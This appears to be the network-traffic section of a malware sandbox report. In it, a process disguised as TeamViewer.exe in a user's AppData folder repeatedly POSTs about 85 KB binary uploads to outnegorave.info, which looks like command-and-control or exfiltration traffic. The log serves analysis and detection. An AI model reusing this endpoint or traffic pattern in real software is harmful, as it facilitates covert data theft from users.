0 | 192.168.2.5 | 49752 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:51:24 UTC | 0 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 85134
Content-Type: multipart/form-data; boundary=--------3509900953
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: outnegorave.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:51:24 UTC | 0 | OUT | Data Ascii:
----------3509900953
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:51:24 UTC | 83 | OUT | Data Ascii:
----------3509900953--
2021-09-15 11:51:27 UTC | 83 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:51:27 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 48
Connection: close
x-powered-by: PHP/5.6.40
set-cookie: X-Csrf-Token=fd09de06337a777c9b5109e018bb22d2333f045eab95a681706e4b800bb28b17; expires=Thu, 15-Sep-2022 11:51:24 GMT; Max-Age=31536000; httponly
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=94mfY8U91g2pH2pTIpBQg7pxoKwCyomw4nxjg9fhlFakdBSKbb7l0R5DehHkpJgxYv2ZKA%2FOukBsjywZKGMATE%2BSzd02qLavuTVnF85%2BA58vHSOWYdBhCE1kB7I9BU7s4SGk"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68f1a49819d705c4-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.5 | 49755 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:51:28 UTC | 84 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 86809
Content-Type: multipart/form-data; boundary=--------4132168479
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: outnegorave.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:51:28 UTC | 84 | OUT | Data Ascii:
----------4132168479
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:51:28 UTC | 169 | OUT | Data Ascii:
----------4132168479--
2021-09-15 11:51:42 UTC | 169 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:51:42 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 48
Connection: close
x-powered-by: PHP/5.6.40
set-cookie: X-Csrf-Token=a4f4f25b5a71c77a54518e53009b542e750d29bb14bd933b08e818c9324c6ca1; expires=Thu, 15-Sep-2022 11:51:28 GMT; Max-Age=31536000; httponly
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=APaiaLPf7kEZ%2Bsz%2FokPocu2MA5SthMkF0tQm5i%2FJwIh5KkVVhrISPAbOEttg7OpOB5lJdN61IXbi22m%2FvaKNStT2G4jiJEqACoGUX3h6XqKQA58s4JNfN6R7PjKXl9Zp%2BAnK"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68f1a4b0989d1f21-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.5 | 49776 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:10 UTC | 847 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 85026
Content-Type: multipart/form-data; boundary=--------3697122959
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: outnegorave.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:52:10 UTC | 847 | OUT | Data Ascii:
----------3697122959
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:52:10 UTC | 930 | OUT | Data Ascii: ----------3697122959--
2021-09-15 11:52:10 UTC | 930 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:52:10 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 48
Connection: close
x-powered-by: PHP/5.6.40
set-cookie: X-Csrf-Token=2a9deea1d8292f695f981fd460a01ba98c8849537bd84c288126da59e8e51793; expires=Thu, 15-Sep-2022 11:52:10 GMT; Max-Age=31536000; httponly
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=itTv5XKz%2BidmsKqJJqK61CBds6hI07FA260TcfKVrPQnOEYSPGiQIQPN9fYKaa%2FMkyqxDlpzVBcIRnXx5mPVIAo8HOTqXAPQi65jvhTMiyCLFupn15PjPWpYzNo8NyCvXfGD"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68f1a5b6b9f6178a-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-15 11:52:10 UTC | 931 | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.5 | 49782 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:11 UTC | 931 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 85132
Content-Type: multipart/form-data; boundary=--------847302753
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: outnegorave.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:52:11 UTC | 931 | OUT | Data Ascii:
----------847302753
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:52:11 UTC | 1015 | OUT | Data Ascii: ----------847302753--
2021-09-15 11:52:11 UTC | 1015 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:52:11 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 48
Connection: close
x-powered-by: PHP/5.6.40
set-cookie: X-Csrf-Token=479b52c9bf4fa67acfa7b1cc6f2e5c84c9ad73e40dd3393f96f0aaee9007cbf9; expires=Thu, 15-Sep-2022 11:52:11 GMT; Max-Age=31536000; httponly
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=UeCPOliV2lUw7ibgotG67Icrr4QUUBkEdP1eu%2BGzjwxbS830BQ9tD7dFuNCoP8ved7hjiHrpudZKJJ5BMs8uFMK1sMhDzqrlXmWxDkOZ%2FrbX45AaJrnM9ARWEFkoxnUhZSa2"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68f1a5bf8c38bef6-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-15 11:52:11 UTC | 1016 | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
12 | 192.168.2.5 | 49790 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:12 UTC | 1016 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 85014
Content-Type: multipart/form-data; boundary=--------4150287082
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: outnegorave.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:52:12 UTC | 1016 | OUT | Data Ascii:
----------4150287082
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
                                                                                                                                    Data Ascii: bLrO{_kYH|?~Jg>j6@9%Q/j<#m}s/2H7H+) 7D8du 2?H#UDQ)+U6`Ax_n.A\hEJj7,kp-G$}CXGj:B?1[m&1{7yw]a*uRNa-4OU`{e
2021-09-15 11:52:12 UTC | 1099 | OUT | Data Ascii: ----------4150287082--
2021-09-15 11:52:13 UTC | 1099 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:13 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=ef3fa9918023131a618282a38fc262eaf3c6afe023126f9d95e1fb593b59ff6c; expires=Thu, 15-Sep-2022 11:52:12 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3FQWPD%2BwQbJucpj6%2FR7WfYxwqwax8zaTdRFMEHPWE6o1%2BlPtqx1WdvSHyywGLehe7m9u7YUZIHVhxvnfz7GgM0z%2BNH%2BVSR2%2BbYnLFP%2B2QgmNkc6kS4aSDPVGn08sljMVjS1G"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5c6ed40d6d5-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-15 11:52:13 UTC | 1100 | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
13 | 192.168.2.5 | 49799 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:13 UTC | 1100 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 85006
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------2687879271
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
2021-09-15 11:52:13 UTC | 1100 | OUT | Data Ascii:
----------2687879271
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:52:13 UTC | 1183 | OUT | Data Ascii: ----------2687879271--
2021-09-15 11:52:14 UTC | 1183 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:14 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=28c7256b50a29eaa4dd51b3b8b5c0731a110e799f0f986e99cfb1cdd217476b1; expires=Thu, 15-Sep-2022 11:52:13 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bvBuL8iZvHU%2B1CDRLK569jULSWOFy19rKIiLXz891SbmZb1OIpASIQHKp9dhF1nNC7B%2FSpvV0anTwUIfFnnv7L7OsdbxalJ0M1BuoyGlQV5jGrNFf9wJbHRGkLJBZF4coitK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5ce8ab742e7-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
2021-09-15 11:52:14 UTC | 1184 | IN | Data Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
14 | 192.168.2.5 | 49805 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:14 UTC | 1184 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84930
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1383517322
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
2021-09-15 11:52:14 UTC | 1184 | OUT | Data Ascii:
----------1383517322
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:52:14 UTC | 1267 | OUT | Data Ascii: ----------1383517322--
2021-09-15 11:52:15 UTC | 1267 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:15 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=10042fce5adbdffe46b4fd39c14deab727d8c28a1d2264d5053f1d8dbd65bf5d; expires=Thu, 15-Sep-2022 11:52:14 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pUbBjFmQwk0%2BKyDj%2Fwf7hcNMpkUCwdvbxOjuGtXqvjp%2BaomlUdJ1IU%2FaTXLaHjVioxFBqBcpZk83Xsq%2FiyiMo1apxX%2Fbeen1bOAbqbJAFEoivEzp3bnYNIqMQe48x%2BVaH%2F4g"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5d53eea4a97-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
15 | 192.168.2.5 | 49806 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:16 UTC | 1268 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84992
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------2011772679
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
2021-09-15 11:52:16 UTC | 1268 | OUT | Data Ascii:
----------2011772679
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:52:17 UTC | 1351 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:17 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=127153de5e1f7d888b503269c624b6a1971f3c3d2858f5802cc3b57199055df5; expires=Thu, 15-Sep-2022 11:52:16 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BaAUYsbMiuLJt5SIFB7X0ZZPrRI8pPRmTkOgktaUj8%2F3FiVAswIlnvp%2FoCQnU%2BiOo3z9uHETG07JhowiYu1m%2FHEsfIl6aULcVCYH4lBzVHjooOqzDdXGRBTu6U3rA%2BFEXaz8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5e16a464dc4-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
16 | 192.168.2.5 | 49807 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:18 UTC | 1352 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84976
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1980331567
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
2021-09-15 11:52:18 UTC | 1353 | OUT | Data Ascii:
----------1980331567
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:52:19 UTC | 1436 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:19 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=f1b9af3ef651e353edcb5055abe125c3a146f77c3b5c60365fa85d7ff29fea70; expires=Thu, 15-Sep-2022 11:52:18 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KxSG2c2emClXHjILrJ5Og4cpHKUZAs0WjLX%2Bb9I3CB9K3FyskShQx3Vta6%2FGXS8Szy1HnMPCsTrLSVOI4kQtZqn%2FEhsH2AyncU5ZXsPYg%2FnxTu76CkH3gSPai%2FJ2pRxUGqmv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5ea1b0a175e-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
17 | 192.168.2.5 | 49808 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:19 UTC | 1436 | OUT | POST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84961
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------2185878550
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:19 UTC1437OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 38 35 38 37 38 35 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------2185878550Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
2021-09-15 11:52:20 UTC | 1520 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:52:20 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 48
Connection: close
x-powered-by: PHP/5.6.40
set-cookie: X-Csrf-Token=dbab5448a34e17af3945c5fa39556548aa585b306410e4e3fffcaa940fc1a1ca; expires=Thu, 15-Sep-2022 11:52:19 GMT; Max-Age=31536000; httponly
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=n3%2BfaHl0dgvj%2BJni2MxmRioC26i%2FwyHTt1Wi%2B8jCkpjX8OC9cU1DRBGbTv4COjKJwMT8cYVARPpGBqtjkPLrj5mbRCmtjBszjPrAI0qH6ewfRSpPCs632HmOZLwg8yDRIH38"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68f1a5f40e2d6949-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
18 | 192.168.2.5 | 49809 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:21 UTC | 1521 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 84985
Content-Type: multipart/form-data; boundary=--------3572611147
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: outnegorave.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:52:21 UTC | 1521 | OUT | Data Ascii:
----------3572611147
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
2021-09-15 11:52:21 UTC | 1604 | IN | HTTP/1.1 200 OK
Date: Wed, 15 Sep 2021 11:52:21 GMT
Content-Type: application/json; charset=UTF-8
Content-Length: 48
Connection: close
x-powered-by: PHP/5.6.40
set-cookie: X-Csrf-Token=9b90ab7820aedb84401c3e4cabe8d1f4de976c24979407334ae140f0d89c29e7; expires=Thu, 15-Sep-2022 11:52:21 GMT; Max-Age=31536000; httponly
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jv8R3YUoJQoPR1blz8rF%2B4rjyKr4SCDFqlvzXddyWzVFtPy4KuRZdNQivKkClAFuzEyb9I13j3R7mL53uWbamJ%2FF6TP0W7oISSENaqJ6Xunn7FydG9t2QnSIngyVkxg4PWRs"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 68f1a5fbed5f4e86-FRA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
19 | 192.168.2.5 | 49810 | 172.67.205.33 | 443 | C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe

Timestamp | kBytes transferred | Direction | Data
2021-09-15 11:52:22 UTC | 1605 | OUT | POST /B8C631A8/ HTTP/1.1
Content-Length: 84961
Content-Type: multipart/form-data; boundary=--------2639774921
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
Host: outnegorave.info
Connection: Close
Cache-Control: no-cache
2021-09-15 11:52:22 UTC | 1605 | OUT | Data Ascii:
----------2639774921
Content-Disposition: form-data; name="k"
Content-Type: text/plain
Content-Transfer-Encoding: binary
                                                                                                                                    Data Ascii: REP)(1R SSQIJ(E%(4@8S6E%-0(h`QE)iS@--%-2BShbJZR$)EShRP`OS$- bP)pD;Lm(&-Q@Ru1N1KLQMpKZJ)Z))hQIK@-SRRRh
                                                                                                                                    2021-09-15 11:52:22 UTC1669OUTData Raw: 36 96 81 0e 14 52 52 d5 08 51 4b 4d cd 2d 31 0e cd 2d 36 96 81 0e 14 a2 9b 4a 0d 52 64 b2 41 45 20 34 55 22 45 a5 a4 a3 34 c2 c2 e6 8c d2 0a 5a 2e 2b 0a 29 73 4c a5 cd 3b 85 87 e6 96 99 9a 5c d3 26 c3 85 2e 69 b9 a2 9d c2 c3 f3 46 69 b9 a3 77 b5 17 15 89 01 a5 cd 47 b8 fa d1 9f 7a 77 15 89 32 28 cd 47 9a 5c d1 71 58 7e 68 cd 37 34 66 9d c2 c3 a9 73 4d a3 34 5c 56 1d 9a 5c d3 33 46 69 dc 2c 3f 34 66 99 ba 93 75 17 0e 52 4c d1 9a 8f 75 1b a9 5c 39 49 37 52 6e a8 8b d3 4b d0 e4 35 02 62 d4 d2 f5 11 7a 69 6a 97 32 94 09 4b d3 0b d4 65 a9 85 aa 1c 8b 50 24 2f ef 4c 2d 4c 2d 4c 2d 50 e4 68 a2 3c b5 30 b5 34 b5 30 b5 66 e4 68 a2 38 9a 61 34 84 d2 54 36 5a 42 93 49 49 46 69 31 d8 43 45 06 9b 52 52 0c d1 49 49 4a e3 b1 43 1d e9 69 28 ae 53 ac 5a 28 a3 14 00 51 45
                                                                                                                                    Data Ascii: 6RRQKM-1-6JRdAE 4U"E4Z.+)sL;\&.iFiwGzw2(G\qX~h74fsM4\V\3Fi,?4fuRLu\9I7RnK5bzij2KeP$/L-L-L-Ph<040fh8a4T6ZBIIFi1CERRIIJCi(SZ(QE
                                                                                                                                    2021-09-15 11:52:22 UTC1685OUTData Raw: ae a1 67 ba 6d 22 4f b6 c2 39 f2 db 0b 28 fe 8d fa 7d 29 9e 20 f8 71 a8 d8 6e 9b 4a 63 7d 00 e7 60 18 95 47 d3 f8 bf 0e 7d ab a0 f0 8f 81 b4 33 6b 1d f5 cc bf da 32 1e a8 cb b5 23 6e ea 53 ae 47 70 df 95 20 3c ae 68 a4 82 56 8a 78 de 39 10 e1 91 d4 82 0f b8 34 ca e8 fe 21 22 47 e3 5b f4 8d 55 11 44 40 2a 8c 00 3c a4 ae 72 a8 41 56 f4 db 26 be ba 11 83 b5 07 2e de 82 aa 57 41 e1 7d b8 b9 07 af cb f9 73 53 27 65 a1 15 2a 2a 6b 9d ab d8 dc b3 d1 ad c2 6c b6 b3 12 6d 1c 92 9b 8f e3 55 f5 0f 0e 0b 85 61 1d ab 43 30 e8 55 08 fc c5 6e 8d ff 00 d9 b6 e2 2c 98 c6 77 e3 fb f9 ef f8 62 b6 f4 df 37 ec 29 e7 e7 76 4e dd dd 76 f6 fe b5 86 26 94 a8 61 d6 21 4b 5e c7 a3 0c 75 3a d3 f6 51 87 ba 78 b4 d1 3c 13 3c 52 a9 57 42 55 81 ec 69 95 b5 e3 1f 2f fe 12 8b df 2b 18 dc
                                                                                                                                    Data Ascii: gm"O9(}) qnJc}`G}3k2#nSGp <hVx94!"G[UD@*<rAV&.WA}sS'e**klmUaC0Un,wb7)vNv&a!K^u:Qx<<RWBUi/+
